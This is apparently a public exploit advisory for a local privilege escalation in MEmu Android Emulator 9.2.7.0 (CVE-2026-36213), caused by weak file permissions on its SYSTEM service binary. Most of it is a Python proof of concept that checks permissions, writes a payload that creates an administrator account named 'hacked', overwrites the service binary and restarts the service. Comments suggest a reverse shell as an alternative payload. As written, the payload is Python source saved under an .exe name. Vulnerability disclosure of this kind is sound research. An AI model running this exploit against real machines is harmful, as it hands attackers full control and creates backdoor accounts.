# Exploit Title: MEmu Android Emulator 9.2.7.0 - Local Privilege Escalation # Google Dork: N/A # Date: 2026-06-16 # Exploit Author: Mohammad # Vendor Homepage: https://www.memuplay.com # Software Link: https://www.memuplay.com/download.html # Version: 9.2.7.0 # Tested on: Windows 10 x64 / Windows 11 x64 # CVE: CVE-2026-36213 ############################################### # Vulnerability Description ############################################### # # MEmu Android Emulator 9.2.7.0 installs a Windows # service named "MEmuSVC" that runs with # NT AUTHORITY\SYSTEM (LocalSystem) privileges. # # The service binary located at: # C:\Program Files\Microvirt\MEmu\MemuService.exe # # is installed with insecure NTFS permissions, # granting FullControl (F) to low-privileged groups: # - BUILTIN\Users # - Everyone # # A low-privileged local user can replace the service # binary with a malicious executable. # Upon service restart, the malicious binary executes # with NT AUTHORITY\SYSTEM privileges. # # Vulnerability Type : Incorrect Access Control # CWE : CWE-732 (Incorrect Permission # Assignment for Critical Resource) # CVSS v3.1 Score : 7.8 HIGH # CVSS Vector : AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H # ############################################### # Verification - Check Permissions ############################################### # # Run the following command to verify vulnerability: # # icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe" # # Vulnerable output: # C:\Program Files\Microvirt\MEmu\MemuService.exe # BUILTIN\Users:(F) # Everyone:(F) # NT AUTHORITY\SYSTEM:(F) # BUILTIN\Administrators:(F) # ############################################### # Proof of Concept ############################################### import os import sys import shutil import subprocess import ctypes # ----------------------------------------------- # Step 1: Check if running as low-privileged user # ----------------------------------------------- def is_admin(): try: return ctypes.windll.shell32.IsUserAnAdmin() except: return False # ----------------------------------------------- # Step 2: Verify vulnerable permissions on binary # ----------------------------------------------- def check_permissions(target_path): print("[*] Checking permissions on service binary...") print(f"[*] Target: {target_path}\n") result = subprocess.run( ["icacls", target_path], capture_output=True, text=True ) output = result.stdout print(output) # Check for vulnerable permissions vulnerable = False dangerous_groups = ["BUILTIN\\Users", "Everyone"] for group in dangerous_groups: if group in output and "(F)" in output: print(f"[!] VULNERABLE: {group} has FullControl (F)") vulnerable = True return vulnerable # ----------------------------------------------- # Step 3: Create malicious payload # (در محیط واقعی اینجا payload قرار میگیره) # ----------------------------------------------- def create_payload(payload_path): print("\n[*] Creating malicious payload...") # این یه نمونه ساده‌ست # در محیط واقعی اینجا کد مخرب قرار میگیره # مثلاً reverse shell یا user creation payload_code = ''' import os # Example: Add new admin user os.system("net user hacked Password123! /add") os.system("net localgroup administrators hacked /add") print("[+] Payload executed as NT AUTHORITY\\SYSTEM") ''' # کامپایل یا آماده‌سازی payload with open(payload_path, "w") as f: f.write(payload_code) print(f"[+] Payload created at: {payload_path}") # ----------------------------------------------- # Step 4: Replace legitimate binary with payload # ----------------------------------------------- def replace_binary(target_path, payload_path): print("\n[*] Replacing service binary...") # Backup original binary backup_path = target_path + ".bak" try: shutil.copy2(target_path, backup_path) print(f"[+] Original backed up to: {backup_path}") shutil.copy2(payload_path, target_path) print(f"[+] Binary replaced successfully!") return True except PermissionError: print("[-] Permission denied - Not vulnerable") return False except Exception as e: print(f"[-] Error: {e}") return False # ----------------------------------------------- # Step 5: Restart service to trigger execution # ----------------------------------------------- def restart_service(service_name): print(f"\n[*] Restarting service: {service_name}") try: subprocess.run( ["sc", "stop", service_name], capture_output=True ) print(f"[+] Service stopped") import time time.sleep(2) subprocess.run( ["sc", "start", service_name], capture_output=True ) print(f"[+] Service started") print(f"[+] Payload should now execute as SYSTEM!") return True except Exception as e: print(f"[-] Error restarting service: {e}") return False # ----------------------------------------------- # Main Exploit Flow # ----------------------------------------------- def main(): print("=" * 55) print(" CVE-2026-36213 - MEmu LPE PoC") print(" MEmu Android Emulator 9.2.7.0") print(" Researcher: Mohammad") print("=" * 55) # Config TARGET_SERVICE = "MEmuSVC" TARGET_BINARY = ( r"C:\Program Files\Microvirt\MEmu\MemuService.exe" ) PAYLOAD_PATH = r"C:\Temp\payload.exe" # Check not running as admin if is_admin(): print("[!] Run this as a LOW-PRIVILEGED user!") print("[!] This PoC demonstrates LPE") sys.exit(1) print(f"[*] Running as: {os.getenv('USERNAME')}") print(f"[*] Admin : {is_admin()} (should be False)\n") # Step 1: Verify vulnerability if not check_permissions(TARGET_BINARY): print("\n[-] Target does not appear vulnerable") print("[-] Permissions may have been fixed") sys.exit(0) print("\n[+] Target is VULNERABLE!") # Step 2: Create payload create_payload(PAYLOAD_PATH) # Step 3: Replace binary if not replace_binary(TARGET_BINARY, PAYLOAD_PATH): print("\n[-] Exploit failed at binary replacement") sys.exit(1) # Step 4: Trigger execution restart_service(TARGET_SERVICE) print("\n[+] Exploit completed!") print("[+] Check if payload executed successfully") print("=" * 55) if __name__ == "__main__": main() ############################################### # Detection Script ############################################### # # Automated detection tool available at: # https://github.com/sec-zone/Hijack-service-binaries # ############################################### # Disclosure Timeline ############################################### # # 2026-02-20 → Vulnerability discovered # 2026-02-20 → CVE-2026-36213 assigned by MITRE # 2026-06-11 → Vendor (Microvirt) notified # 2026-06-16 → Public disclosure # ############################################### # References ############################################### # # [1] CWE-732: Incorrect Permission Assignment # https://cwe.mitre.org/data/definitions/732.html # # [2] CVE-2026-36213 # https://www.cve.org/CVERecord?id=CVE-2026-36213 # # [3] Detection Script # https://github.com/sec-zone/Hijack-service-binaries # ###############################################